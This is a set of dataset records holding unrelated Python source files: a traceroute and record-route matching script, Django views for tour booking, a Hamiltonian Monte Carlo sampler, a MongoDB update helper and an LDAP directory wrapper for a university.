pass\n","sub_path":"workspace/src/localize/scripts/LPF_rosnode.py","file_name":"LPF_rosnode.py","file_ext":"py","file_size_in_byte":10116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"530875447","text":"import ipaddress\nimport argparse\nimport sys\nfrom mysql.connector import connect\nfrom atlas.atlas_database import get_connection, get_select_alias_query, get_alias_sets\n\n\ndef get_vps():\n database = \"plcontroller\"\n query = (\n f\" SELECT ip, site FROM {database}.vantage_point \"\n )\n # print(query)\n\n # Get the connection to\n connection = get_connection(database)\n cursor = connection.cursor()\n cursor.execute(query, )\n rows = cursor.fetchall()\n vps = []\n for row in rows:\n ip, site = row\n vps.append(ip)\n cursor.close()\n connection.close()\n return vps\n\n\ndef check_destination_based_routing(tr_hops, tr_hop_ping_id_rr_hops):\n '''\n Perform a sanity check that next rr hop of current tr_hop is contained in the next tr_hop RR\n :param tr_hop_ping_id_rr_hops:\n :return:\n '''\n for i, tr_hop in enumerate(tr_hops):\n if tr_hop not in tr_hop_ping_id_rr_hops:\n continue\n # Is this hop in a tunnel?\n # Look at next hop\n\n # for dst_tr_hop, ping_id_rr_hops in :\n\n\ndef flatten_connected(successors_per_hop):\n for hop in successors_per_hop:\n successors = successors_per_hop[hop]\n prev_successors = set()\n while len(successors) != len(prev_successors):\n prev_successors = set(successors)\n new_successors = set(successors)\n for successor in successors:\n if successor in successors_per_hop:\n new_successors.update(successors_per_hop[successor])\n successors = new_successors\n successors_per_hop[hop] = successors\n\ndef compute_pred_succ_constraints(tr_hop_ping_id_rr_hops):\n '''\n Ugly implementation to find successors and predecessors of hops in RR\n :param tr_hop_ping_id_rr_hops:\n :return:\n '''\n predecessors_per_hop = {}\n successors_per_hop = {}\n for tr_hop, ping_id_rr_hops in tr_hop_ping_id_rr_hops.items():\n for _, rr_hops in ping_id_rr_hops.items():\n rr_hops = sorted(rr_hops, key=lambda x: x[1])\n for i in range(len(rr_hops)):\n rr_hop_i, _ = rr_hops[i]\n for j in range(i+1, len(rr_hops)):\n rr_hop_j, _ = rr_hops[j]\n predecessors_per_hop.setdefault(rr_hop_j, set()).add(rr_hop_i)\n successors_per_hop.setdefault(rr_hop_i, set()).add(rr_hop_j)\n\n # Flatten the predecessors so that every hop has the full set of predecessors/successors.\n flatten_connected(successors_per_hop)\n flatten_connected(predecessors_per_hop)\n\n return predecessors_per_hop, successors_per_hop\n\n\ndef match_rr_tr_hops(cursor, ips_for_alias_set, rr_hops_per_tr_id, tr_hops_per_tr_id, with_p2p):\n # Get the alias of all the IPs seen in the traceroutes\n alias_set_by_ip = get_alias_sets(tuple(ips_for_alias_set))\n\n # For each rr hop, a subpath corresponding to the potential intersection\n rr_intersection_rows_to_insert = []\n for tr_id, tr_hop_ping_id_rr_hops in rr_hops_per_tr_id.items():\n # if tr_id != 2467:\n # continue\n predecessors_per_hop, successors_per_hop = compute_pred_succ_constraints(tr_hop_ping_id_rr_hops)\n # print(tr_id)\n intersects_per_rr_hop = {}\n # Index per tr hop for faster retrieve\n tr_hops = tr_hops_per_tr_id[tr_id]\n tr_hops.sort(key=lambda x: x[1])\n index_per_tr_hop = {tr_hop[0]: i for i, tr_hop in enumerate(tr_hops)}\n\n aliases_tr = {alias_set_by_ip[hop[0]]: hop[0] for hop in tr_hops if hop[0] in alias_set_by_ip}\n p2p_tr = {str(ipaddress.ip_network(str(ipaddress.ip_address(hop[0])) + \"/30\", strict=False)): 
tr_hops[i - 1][0]\n for i, hop in enumerate(tr_hops)\n if i > 0\n }\n if with_p2p:\n aliases_tr.update(p2p_tr)\n # Two types of constraints\n # Alias and p2p link\n for dst_tr_hop, ping_id_rr_hops in tr_hop_ping_id_rr_hops.items():\n for ping_id, rr_hops in ping_id_rr_hops.items():\n # Sort the rr hops by their index\n rr_hops = sorted(rr_hops, key=lambda x: x[1])\n # Get the aliases in rr and tr hops\n matches_rr = [(i, hop[0], aliases_tr[alias_set_by_ip[hop[0]]], \"alias\")\n for i, hop in enumerate(rr_hops)\n if hop[0] in alias_set_by_ip\n and alias_set_by_ip[hop[\n 0]] in aliases_tr # Case where the rr hop is in another alias set not present in tr\n and hop[0] not in index_per_tr_hop\n ]\n if with_p2p:\n matches_p2p_rr = [(i, hop[0],\n aliases_tr[str(ipaddress.ip_network(str(ipaddress.ip_address(hop[0])) + \"/30\",\n strict=False))],\n \"p2p\")\n for i, hop in enumerate(rr_hops)\n if str(\n ipaddress.ip_network(str(ipaddress.ip_address(hop[0])) + \"/30\", strict=False)) in p2p_tr\n and hop[0] not in index_per_tr_hop]\n matches_rr.extend(matches_p2p_rr)\n matches_rr.sort(key=lambda x: x[0])\n\n for i, rr_hop in enumerate(rr_hops):\n if rr_hop[0] in index_per_tr_hop:\n continue\n previous_tr_hop = index_per_tr_hop[dst_tr_hop]\n next_hop_rr_alias = None\n for j, _, alias_tr, from_ in matches_rr:\n # Find the closest tr hops before and after this rr hop.\n if i == j:\n previous_tr_hop = index_per_tr_hop[alias_tr]\n next_hop_rr_alias = previous_tr_hop\n break\n elif i > j:\n candidate_previous_tr_hop_index = index_per_tr_hop[alias_tr]\n if candidate_previous_tr_hop_index > previous_tr_hop:\n previous_tr_hop = candidate_previous_tr_hop_index\n elif i < j:\n # It is a candidate after the RR hop, so the closest after the RR hop\n next_hop_rr_alias = index_per_tr_hop[alias_tr]\n break\n\n if next_hop_rr_alias is None:\n next_hop_rr_alias = max(index_per_tr_hop.values())\n if rr_hop[0] not in intersects_per_rr_hop:\n intersects_per_rr_hop[rr_hop[0]] = previous_tr_hop, next_hop_rr_alias\n else:\n # Look if we found a smaller subpath\n current_previous_tr_hop, current_next_tr_hop = intersects_per_rr_hop[rr_hop[0]]\n if previous_tr_hop > current_previous_tr_hop:\n current_previous_tr_hop = previous_tr_hop\n if next_hop_rr_alias < current_next_tr_hop:\n current_next_tr_hop = next_hop_rr_alias\n intersects_per_rr_hop[rr_hop[0]] = current_previous_tr_hop, current_next_tr_hop\n\n # Use the constraints found with the successors, predecessors of the rr_hop to see\n # if we can do better\n intersects_per_rr_hop_with_pred_succ = {}\n for rr_hop in intersects_per_rr_hop:\n previous_tr_hop, next_tr_hop = intersects_per_rr_hop[rr_hop]\n if rr_hop in successors_per_hop:\n succ_tr_hop = [intersects_per_rr_hop[successor][1] for successor in successors_per_hop[rr_hop] if\n successor in intersects_per_rr_hop]\n if len(succ_tr_hop) > 0:\n min_succ_tr_hop = min(succ_tr_hop)\n if min_succ_tr_hop < next_tr_hop:\n next_tr_hop = min_succ_tr_hop\n if rr_hop in predecessors_per_hop:\n pred_tr_hop = [intersects_per_rr_hop[predecessor][0] for predecessor in predecessors_per_hop[rr_hop] if\n predecessor in intersects_per_rr_hop]\n if len(pred_tr_hop) > 0:\n max_pred_tr_hop = max(pred_tr_hop)\n if max_pred_tr_hop > previous_tr_hop:\n previous_tr_hop = max_pred_tr_hop\n intersects_per_rr_hop_with_pred_succ[rr_hop] = previous_tr_hop, next_tr_hop\n\n # print(tr_id)\n # Now insert the subpaths intersection into the database\n\n for rr_hop, (tr_hop_start_index, tr_hop_end_index) in intersects_per_rr_hop_with_pred_succ.items():\n 
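# map the matched tr-hop indices back to traceroute TTL values for the rows to insert\n            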
tr_ttl_start = tr_hops[tr_hop_start_index][1]\n tr_ttl_end = tr_hops[tr_hop_end_index][1]\n rr_intersection_rows_to_insert.append((tr_id, rr_hop, tr_ttl_start, tr_ttl_end))\n\n query = (\n f\" INSERT INTO atlas_rr_intersection (traceroute_id, rr_hop, tr_ttl_start, tr_ttl_end) \"\n f\" VALUES (%s, %s, %s, %s) \"\n )\n cursor.executemany(query, rr_intersection_rows_to_insert)\n\ndef match_rr_tr_hops_traceroute_ids(traceroute_ids, with_p2p):\n connection = get_connection(\"traceroute_atlas\", autocommit=0)\n traceroute_ids = list(traceroute_ids)\n for i in range(0, len(traceroute_ids), 1000):\n max_index = i + 1000\n if i + 1000 > len(traceroute_ids):\n max_index = len(traceroute_ids)\n in_clause= f\"\".join([f\",{traceroute_id}\" for traceroute_id in traceroute_ids[i:max_index]])[1:]\n\n query = (\n f\" SELECT traceroute_id, ping_id, tr_hop, rr_hop, rr_hop_index \"\n f\" FROM atlas_rr_pings arrp \"\n f\" INNER JOIN atlas_traceroutes at ON at.id = arrp.traceroute_id \"\n f\" WHERE at.id in ({in_clause}) \"\n f\" ORDER BY traceroute_id, ping_id, rr_hop_index \"\n )\n cursor = connection.cursor()\n cursor.execute(query, )\n # rows = cursor.fetchmany(batch_size)\n rows = cursor.fetchall()\n if len(rows) == 0:\n return\n # print(f\"Fetched {len(rows)} rows\")\n i = 0\n rr_hops_per_tr_id = {}\n ips_for_alias_set = set()\n for row in rows:\n i += 1\n tr_id, ping_id, tr_hop, rr_hop, rr_hop_index = row\n if ipaddress.ip_address(rr_hop).is_private:\n continue\n ips_for_alias_set.add(rr_hop)\n # rr hops are ordered\n rr_hops_per_tr_id.setdefault(tr_id, {}).setdefault(tr_hop, {}).setdefault(ping_id, []).append(\n (rr_hop, rr_hop_index))\n\n query = (\n f\" SELECT src, dest, trace_id, ath.hop, ath.ttl\"\n f\" FROM atlas_traceroute_hops ath\"\n f\" INNER JOIN atlas_traceroutes at ON at.id = ath.trace_id \"\n f\" WHERE at.id in ({in_clause}) \"\n f\" ORDER BY trace_id, ttl\"\n )\n\n cursor.execute(query, )\n # rows = cursor.fetchmany(batch_size)\n rows = cursor.fetchall()\n src_dst_per_tr_id = {}\n tr_hops_per_tr_id = {}\n for row in rows:\n src, dest, trace_id, hop, ttl = row\n tr_hops_per_tr_id.setdefault(trace_id, []).append((hop, ttl))\n src_dst_per_tr_id[trace_id] = (src, dest)\n\n match_rr_tr_hops(cursor, ips_for_alias_set, rr_hops_per_tr_id, tr_hops_per_tr_id, with_p2p)\n\n connection.commit()\n cursor.close()\n connection.close()\n\ndef compute_tr_hops_by_tr_id(cursor, src, label):\n query = (\n f\" SELECT src, dest, trace_id, ath.hop, ath.ttl\"\n f\" FROM atlas_traceroute_hops ath\"\n f\" INNER JOIN atlas_traceroutes at ON at.id = ath.trace_id \"\n f\" WHERE at.dest={src} \"\n )\n if label is not None:\n query += f\" AND at.platform='{label}' \"\n query += (\n f\" ORDER BY trace_id, ttl\"\n )\n\n cursor.execute(query, )\n # rows = cursor.fetchmany(batch_size)\n rows = cursor.fetchall()\n src_dst_per_tr_id = {}\n tr_hops_per_tr_id = {}\n for row in rows:\n src, dest, trace_id, hop, ttl = row\n tr_hops_per_tr_id.setdefault(trace_id, []).append((hop, ttl))\n src_dst_per_tr_id[trace_id] = (src, dest)\n\n return tr_hops_per_tr_id, src_dst_per_tr_id\n\ndef compute_rr_hops_by_tr_id(cursor, src, label):\n query = (\n f\" SELECT traceroute_id, ping_id, tr_hop, rr_hop, rr_hop_index \"\n f\" FROM atlas_rr_pings arrp \"\n f\" INNER JOIN atlas_traceroutes at ON at.id = arrp.traceroute_id \"\n f\" WHERE at.dest={src} \"\n )\n if label is not None:\n query += f\" AND at.platform='{label}' \"\n query += (\n f\" ORDER BY traceroute_id, ping_id, rr_hop_index \"\n\n )\n\n cursor.execute(query, )\n # rows = 
cursor.fetchmany(batch_size)\n    rows = cursor.fetchall()\n    if len(rows) == 0:\n        return\n    # print(f\"Fetched {len(rows)} rows\")\n    i = 0\n    rr_hops_per_tr_id = {}\n    ips_for_alias_set = set()\n    for row in rows:\n        i += 1\n        tr_id, ping_id, tr_hop, rr_hop, rr_hop_index = row\n        if ipaddress.ip_address(rr_hop).is_private:\n            continue\n        ips_for_alias_set.add(rr_hop)\n        # rr hops are ordered\n        rr_hops_per_tr_id.setdefault(tr_id, {}).setdefault(tr_hop, {}).setdefault(ping_id, []).append(\n            (rr_hop, rr_hop_index))\n    return rr_hops_per_tr_id, ips_for_alias_set\n\ndef match_rr_tr_hops_all(with_p2p, label):\n    vps = get_vps()\n\n    for src in vps:\n        print(src)\n        connection = get_connection(\"traceroute_atlas\", autocommit=0)\n        cursor = connection.cursor()\n\n        rr_hops_per_tr_id_ips_for_alias_set = compute_rr_hops_by_tr_id(cursor, src, label)\n        if rr_hops_per_tr_id_ips_for_alias_set is not None:\n            rr_hops_per_tr_id, ips_for_alias_set = rr_hops_per_tr_id_ips_for_alias_set\n            tr_hops_per_tr_id, src_dst_per_tr_id = compute_tr_hops_by_tr_id(cursor, src, label)\n            match_rr_tr_hops(cursor, ips_for_alias_set, rr_hops_per_tr_id, tr_hops_per_tr_id, with_p2p)\n\n        connection.commit()\n        connection.close()\n\n\nif __name__ == \"__main__\":\n\n    '''\n    Run the intersection algorithm to find which RR hop corresponds to which TrHop in traceroutes. \n    '''\n\n    ######################################################################\n    ## Parameters\n    ######################################################################\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-m\", \"--mode\", help=\"mode, either all, label or selection\", type=str)\n    parser.add_argument(\"-l\", \"--label\", help=\"label of the traceroutes in the database\", type=str)\n    parser.add_argument(\"--id\", help=\"traceroute id\", type=int)\n    parser.add_argument(\"--ids-file\", help=\"file containing traceroute ids\", type=str)\n\n\n    args = parser.parse_args()\n\n    if not args.mode or args.mode not in [\"all\", \"selection\", \"label\"]:\n        parser.error(\"mode option is mandatory, values are all, selection or label\")\n        exit(1)\n\n    if args.mode == \"all\":\n        match_rr_tr_hops_all(with_p2p=True, label=args.label)\n    elif args.mode == \"selection\":\n        traceroute_ids = set()\n        with open(args.ids_file) as f:\n            for line in f:\n                traceroute_ids.add(int(line.strip(\"\\n\")))\n\n        match_rr_tr_hops_traceroute_ids(traceroute_ids, with_p2p=True)\n    elif args.mode == \"label\":\n        match_rr_tr_hops_all(with_p2p=True, label=args.label)\n","sub_path":"rankingservice/atlas/record_route.py","file_name":"record_route.py","file_ext":"py","file_size_in_byte":15606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"187451221","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Tour, Order\nfrom django.contrib.auth import get_user\nfrom .forms import AddOrder, UserRegistrationForm\n\n\n\ndef near_tours():\n    near_tours = Tour.objects.all().order_by('start_date')[:3]\n    return near_tours\n\ndef home(request):\n    return render(request, 'home.html',{'near_tours':near_tours()})\n\ndef tour_list(request, tour_type):\n    tours = []\n    unique_tours = set(Tour.objects.filter(tour_type=tour_type).values_list('title', flat=True))\n    for title in unique_tours:\n        tours += [Tour.objects.filter(title=title)[0]]\n    return render(request, 'tour_list.html', {'tours': tours,'near_tours':near_tours()})\n\n\ndef tour_detail(request, tour_id, tour_type):\n    tour = get_object_or_404(Tour, id=tour_id)\n
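    # every scheduled departure sharing this tour's title, earliest first\n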
    tours = Tour.objects.filter(title=tour.title).order_by('start_date')\n    if request.method == \"POST\":\n        new_tours = []\n        for tour in tours:\n            tour.form = AddOrder(request.POST,prefix=tour.id)\n\n            if str(tour.form['person_numbers']).find('value') !=-1 and str(tour.form['contact_phone']).find('value') !=-1:\n\n                if tour.form.is_valid():\n                    order = Order()\n                    order.person_numbers = tour.form.cleaned_data['person_numbers']\n                    order.contact_phone = tour.form.cleaned_data['contact_phone']\n                    order.user = get_user(request)\n                    tour = get_object_or_404(Tour, start_date=request.POST['start_date'])\n                    order.tour = tour\n                    if int(order.person_numbers) <= tour.vacant_spot:\n                        tour.vacant_spot = tour.vacant_spot - int(order.person_numbers)\n                        tour.save()\n                        order.save()\n                        return render(request, 'tour_confirm.html', {'tour': order.tour})\n                    else:\n                        tour.message = 'Not enough vacant spots'\n                        tour.form = AddOrder(request.POST, prefix=tour.id)\n                        new_tours.append(tour)\n                else:\n                    tour.form = AddOrder(request.POST, prefix=tour.id)\n                    new_tours.append(tour)\n            else:\n                tour.message = ''\n                tour.form = AddOrder(prefix=tour.id)\n                new_tours.append(tour)\n        return render(request, 'tour_detail.html', {'tour': tour, 'tours': new_tours, 'near_tours': near_tours(),'anchor': 'comment'})\n    else:\n        for tour in tours:\n            tour.form = AddOrder(prefix=tour.id)\n\n    return render(request, 'tour_detail.html', {'tour':tour, 'tours':tours,'near_tours':near_tours()})\n\n\ndef register(request):\n    if request.method == 'POST':\n        user_form = UserRegistrationForm(request.POST)\n        if user_form.is_valid():\n            new_user = user_form.save(commit=False)\n            new_user.set_password(user_form.cleaned_data['password'])\n            new_user.save()\n            return render(request, 'register_done.html', {'new_user': new_user})\n    else:\n        user_form = UserRegistrationForm()\n    return render(request, 'register.html', {'user_form': user_form})\n\ndef orders(request):\n    orders = Order.objects.all().order_by('-id')\n    return render(request, 'order_list.html', {'orders': orders})\n\n","sub_path":"Tasks/Olga Ivanova/Project/Vtur/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"85006580","text":"import numpy as np\nfrom collections import deque\nfrom .hmc import HamiltonianUpdate, HamiltonState\nfrom ..densities.gaussian import Gaussian\nfrom ..sampling import Sample\nfrom ..util import is_power_of_ten\n\n\ndef integrator(q, pot_gradient, v, du, lim_lower, lim_upper, stepsize, nsteps):\n    # make a half step for velocity\n    v = v - stepsize/2 * du\n    \n    # alternate full steps for position and momentum\n    for l in range(nsteps):\n        # make a full step for position\n        q = q + stepsize * v\n\n        # handle constraints by wall hitting\n        while(True):\n            l_c = q < lim_lower\n            u_c = q > lim_upper\n\n            if l_c.any():\n                q[l_c] = 2*lim_lower[l_c[0]] - q[l_c]\n                v[l_c] = -v[l_c]\n            elif u_c.any():\n                q[u_c] = 2*lim_upper[u_c[0]] - q[u_c]\n                v[u_c] = -v[u_c]\n            else:\n                break\n\n        # make full step for velocity\n        du = pot_gradient(q)[0]\n        if np.isinf(du).any():\n            return None, None, None \n\n        if l != nsteps-1:\n            v = v - stepsize * du\n\n    # make last half step for velocity\n    v = v - stepsize/2 * du\n    \n    return q, v, du\n\n\nclass WallHMC(HamiltonianUpdate):\n    \"\"\"\n    Wall HMC for box type constraints\n    \"\"\"\n\n    def __init__(self, target_density, stepsize_min, stepsize_max,\n                 nsteps_min, nsteps_max, lim_lower=None, lim_upper=None,\n                 is_adaptive=False):\n        p_dist = Gaussian(target_density.ndim)\n        
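# Gaussian momentum distribution; its samples become the proposal velocities\n        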
super().__init__(target_density, p_dist, None, None, is_adaptive=is_adaptive)\n self.target_density = target_density\n self.p_dist = p_dist\n\n # default limits: unit hypercube\n if lim_lower is None:\n lim_lower = np.zeros(self.target_density.ndim)\n if lim_upper is None:\n lim_upper = np.ones(self.target_density.ndim)\n\n self.stepsize_min = stepsize_min\n self.stepsize_max = stepsize_max\n self.nsteps_min = nsteps_min\n self.nsteps_max = nsteps_max\n self.lim_lower = lim_lower\n self.lim_upper = lim_upper\n\n def init_state(self, state):\n if not isinstance(state, HamiltonState):\n state = HamiltonState(state)\n\n return super().init_state(state)\n \n def proposal(self, current):\n \"\"\"Propose a new state.\"\"\"\n # initialization\n #try:\n # q = current\n # du = current.pot_gradient\n #except AttributeError:\n # current = self.init_state(current)\n # q = current\n # du = current.pot_gradient\n q = current\n du = self.target_density.pot_gradient(q)\n\n # sample velocity\n v = current.momentum = self.p_dist.proposal()\n\n # sample integrator parameters\n nsteps = np.random.randint(self.nsteps_min, self.nsteps_max + 1)\n stepsize = (np.random.rand() * (self.stepsize_max - self.stepsize_min) +\n self.stepsize_min)\n \n # integrate\n q, v, du = integrator(q, self.target_density.pot_gradient, v, du,\n self.lim_lower, self.lim_upper, stepsize, nsteps)\n\n if q is None:\n return None\n\n #pot = self.target_density.pot(q)\n #return HamiltonState(q, momentum=v, pot_gradient=du, pot=pot)\n return HamiltonState(q, momentum=v)\n\n def accept(self, state, candidate):\n \"\"\"Return the logarithm of the acceptance probability.\"\"\"\n try:\n U_current = self.target_density.pot(state)\n #if np.isinf(U_current): # shouldn't be necessary\n # return 0\n H_current = U_current + .5*state.momentum.dot(state.momentum)\n U_proposal = self.target_density.pot(candidate)\n if np.isinf(U_proposal):\n return -np.inf\n H_proposal = U_proposal + .5*candidate.momentum[0].dot(candidate.momentum[0])\n log_prob = -H_proposal + H_current\n if np.isinf(log_prob): # shouldn't be necessary\n return -np.inf\n return log_prob\n except RuntimeWarning:\n return -np.inf\n\n def next_state(self, state, iteration):\n candidate = self.proposal(state)\n if candidate is None:\n return state\n\n try:\n log_accept = self.accept(state, candidate)\n except (TypeError, AttributeError):\n # in situations like mixing/composite updates, previous update\n # may not have set necessary attributes (such as pdf)\n state = self.init_state(state)\n log_accept = self.accept(state, candidate)\n\n #if not np.isinf(log_accept) and np.log(np.random.rand()) < min(0, log_accept):\n if np.log(np.random.rand()) < log_accept:\n next_state = candidate\n else:\n next_state = state\n\n if self.is_adaptive:\n self.adapt(iteration, state, next_state, log_accept)\n\n return next_state\n\n #def sample(self, sample_size, initial, out_mask=None, n_batches=20):\n # \"\"\"\n # Return a weighted sample. 
To get an unweighted sample it has \n # to be resampled using np.random.choice()\n # \"\"\"\n\n # # initialize sampling\n # state = self.init_state(np.atleast_1d(initial))\n # if len(state) != self.target_density.ndim:\n # raise ValueError('initial must have dimension ' + str(self.target_density.ndim))\n # self.init_adapt(state) # initial adaptation\n\n # batch_length = int(sample_size/n_batches)\n\n # tags = dict()\n # tagged = dict()\n\n # chain = np.empty((sample_size, self.target_density.ndim))\n # chain[0] = state\n\n # batch_accept = deque(maxlen=batch_length)\n # current_seq = 1 # current sequence length\n # max_seq = 1 # maximal sequence length\n # skip = 1\n # for i in range(1, sample_size):\n # state = self.next_state(state, i)\n # if not np.array_equal(state, chain[i - 1]):\n # batch_accept.append(1)\n # if current_seq > max_seq:\n # max_seq = current_seq\n # current_seq = 1\n # else:\n # batch_accept.append(0)\n # current_seq += 1\n\n # chain[i] = state\n # try:\n # try:\n # tags[state.tag_parser].append(state.tag)\n # tagged[state.tag_parser].append(i)\n # except KeyError:\n # tags[state.tag_parser] = []\n # tagged[state.tag_parser] = []\n # except AttributeError:\n # pass\n\n # if i % skip == 0:\n # if i >= batch_length:\n # accept_rate = sum(batch_accept)/batch_length\n # else:\n # accept_rate = sum(batch_accept)/i\n # if i == 1:\n # print(\"Event 1\\t(batch acceptance rate: %f)\" % (accept_rate))\n # else:\n # print(\"Event %i\\t(batch acceptance rate: %f)\\tmax sequence length: %i\" % (i, accept_rate, max(current_seq, max_seq)))\n # if is_power_of_ten(i):\n # skip *= 10\n\n # if out_mask is not None:\n # chain = chain[:, out_mask]\n\n # for parser in tagged:\n # chain[tagged[parser]] = parser(chain[tagged[parser]], tags[parser])\n\n # sample = Sample(data=chain, target=self.target_density)\n # return sample\n","sub_path":"src/hepmc/core/hamiltonian/wall_hmc.py","file_name":"wall_hmc.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"275128142","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4\n\nfrom django.conf import settings\nimport os, json, sys\nimport datetime\nfrom bson.code import Code\nfrom bson.objectid import ObjectId\nfrom bson import json_util\nfrom pymongo import MongoClient, DESCENDING\nfrom collections import OrderedDict\n\n\n\ndef to_json(results_dict):\n return json.dumps(results_dict, indent = 4, default=json_util.default)\n \n \ndef update_mongo_pjson(document, database_name=\"nppes\", collection_name=\"pjson\"):\n \"\"\"Update a Provider JSON resource. 
The resource must exist in this implementation.\n \"\"\"\n l=[]\n response_dict=OrderedDict()\n invalid = False\n existing_document = None\n try:\n\n mc = MongoClient(host='127.0.0.1', port=27017, document_class=OrderedDict)\n db = mc[database_name]\n collection = db[collection_name]\n\n myobject=collection.find_one({'number':document['number']})\n response_dict['number'] = document['number']\n if not myobject:\n response_dict['code']=404\n response_dict['errors']=[\"The record cannot be updated because it is not found in the database.\",]\n \n else:\n document['_id'] = myobject['_id']\n myobjectid=collection.save(document)\n response_dict['code']=200\n except:\n print(\"Error reading from Mongo\")\n print(str(sys.exc_info()))\n response_dict['code'] = 500\n response_dict['errors']=[ str(sys.exc_info()), ]\n\n \n return response_dict\n\n\n","sub_path":"apps/nppes_handler/mongoutils.py","file_name":"mongoutils.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"184900302","text":"\"\"\"\nAccess and query The University's TED database.\n\nOriginally authored by Gary Wilson Jr. while in the ECE Department, and since\nadapted to make use of the python-simpleldap library that was factored out of\nthe original work.\n\"\"\"\n\nfrom getpass import getpass\nfrom ldap.filter import filter_format\nfrom simpleldap import Connection, LDAPItem\n\n\nclass TEDLDAPItem(LDAPItem):\n \"\"\"\n An extension of LDAPItem with methods specific to TED.\n \"\"\"\n\n def is_active(self):\n \"\"\"\n Return True if object has 'Active' inetUserStatus.\n Indicates whether the person is permitted to logon using their UT EID.\n \"\"\"\n return self.first('inetUserStatus') == 'Active'\n\n def has_affiliation(self, value):\n \"\"\"\n Return True if object has the passed value in the eduPersonAffiliation\n attribute.\n \"\"\"\n return value in self['eduPersonAffiliation']\n\n def has_entitlement(self, code):\n \"\"\"\n Return True if object has the given entitlement code.\n \"\"\"\n return code in self['utexasEduPersonEntitlementCode']\n\n def in_depts(self, depts, attr='utexasEduPersonOrgUnitName'):\n \"\"\"\n Return True if object is in any of the given departments, using the\n utexasEduPersonOrgUnitName attribute to determine membership.\n\n If depts is empty, then return True.\n\n attr is the attribute to use to determine department membership. The\n default is 'utexasEduPersonOrgUnitName', but when looking up a student\n you'll likely want to use 'utexasEduPersonMajorDept'.\n \"\"\"\n if not depts:\n return True\n for dept in depts:\n if dept in self[attr]:\n return True\n return False\n\n def is_faculty(self, depts=[]):\n \"\"\"\n Return True if object has 'faculty' in the eduPersonAffiliation\n attribute. Accepts an optional list of department names passed as\n depts, that will also check that the object has one of those\n department names in the utexasEduPersonOrgUnitName attribute.\n \"\"\"\n return self.has_affiliation('faculty') and self.in_depts(depts)\n\n def is_staff(self, depts=[]):\n \"\"\"\n Return True if object has 'staff' in the eduPersonAffiliation\n attribute. 
Accepts an optional list of department names passed as\n depts, that will also check that the object has one of those\n department names in the utexasEduPersonOrgUnitName attribute.\n \"\"\"\n return self.has_affiliation('staff') and self.in_depts(depts)\n\n def is_student(self, depts=[]):\n \"\"\"\n Return True if object has 'student' in the eduPersonAffiliation\n attribute. Accepts an optional list of department names passed as\n depts, that if passed will also check that the object is a major of\n one of those departments.\n \"\"\"\n return self.has_affiliation('student') \\\n and self.in_depts(depts, attr='utexasEduPersonMajorDept')\n\n def is_member(self):\n \"\"\"\n Return True if object has 'member' in the eduPersonAffiliation\n attribute.\n \"\"\"\n return self.has_affiliation('member')\n\n def is_affiliate(self):\n \"\"\"\n Return True if object has 'affiliate' in the eduPersonAffiliation\n attribute.\n \"\"\"\n return self.has_affiliation('affiliate')\n\n def has_signature_authority(self):\n \"\"\"\n Return True if object's EID has electronic signature authority\n (SIG entitlement).\n \"\"\"\n return self.has_entitlement(\"SIG\")\n\n def is_developer(self):\n \"\"\"\n Return True if the object has the developer (DEV) entitlement.\n \"\"\"\n return self.has_entitlement(\"DEV\")\n\n def is_restricted(self):\n \"\"\"\n Return True if the person's data is restricted\n \"\"\"\n restrictions = [\n self.get('utexasEduPersonAttrRestrict', None),\n self.get('utexasEduPersonRecordRestrict', None),\n ]\n return restrictions != [None,None]\n\n\nclass TEDConnection(Connection):\n \"\"\"\n A connection to TED, the uTexas Enterprise Directory.\n \"\"\"\n\n # Default attributes to return for searches.\n attributes = [\n 'cn',\n 'givenName',\n 'sn',\n 'inetUserStatus',\n 'utexasEduPersonEid',\n 'utexasEduPersonUin',\n 'utexasEduPersonIsoNumber',\n 'utexasEduPersonOrgUnitName',\n 'utexasEduPersonPubAffiliation',\n 'eduPersonAffiliation',\n 'utexasEduPersonPrimaryTitle',\n 'utexasEduPersonHighestDegree',\n 'utexasEduPersonCourseNumber',\n 'utexasEduPersonOrgUnitName',\n 'utexasEduPersonMajorDept',\n 'mail',\n 'utexasEduPersonEntitlementCode',\n 'utexasEduPersonAttrRestrict',\n 'utexasEduPersonRecordRestrict',\n ]\n\n result_item_class = TEDLDAPItem\n\n def __init__(self, dn=None, eid=None, password='', service=True,\n hostname=None, **kwargs):\n \"\"\"\n A connection to the TED server.\n\n Typically, ``eid`` and ``password`` are given, and represent the user\n to bind as. By default, ``eid`` is considered to be a Service EID.\n To use a person EID, set ``service`` to ``False``. Alternatively, you\n may pass a fully-qualified distinguished name as ``dn``, which,\n if given, will be the exact dn string used to bind. If you pass no\n dn or password, both default to empty string (anonymous bind).\n\n If host is not given, it defaults to 'entdir.utexas.edu'.\n If encryption is not given, it defaults to 'ssl'.\n \"\"\"\n dn = self._get_dn(dn, eid, service)\n if 'encryption' not in kwargs:\n kwargs['encryption'] = 'ssl'\n super(TEDConnection, self).__init__(hostname, dn=dn, password=password,\n **kwargs)\n\n def _get_dn(self, dn=None, eid=None, service=None):\n \"\"\"\n Helper function to return a dn based the passed values. 
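# --- Editor's note: hedged aside. ---
# Usage sketch for the TED classes in this record. The EID, password and
# department name below are hypothetical, and a reachable TED/LDAP server is
# required, so this is illustration only:
#
#   conn = TEDConnection(eid='svc-myapp', password='secret', service=True)
#   person = conn.get_by_eid('jdoe')
#   person.is_student(depts=['Electrical and Computer Engineering'])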
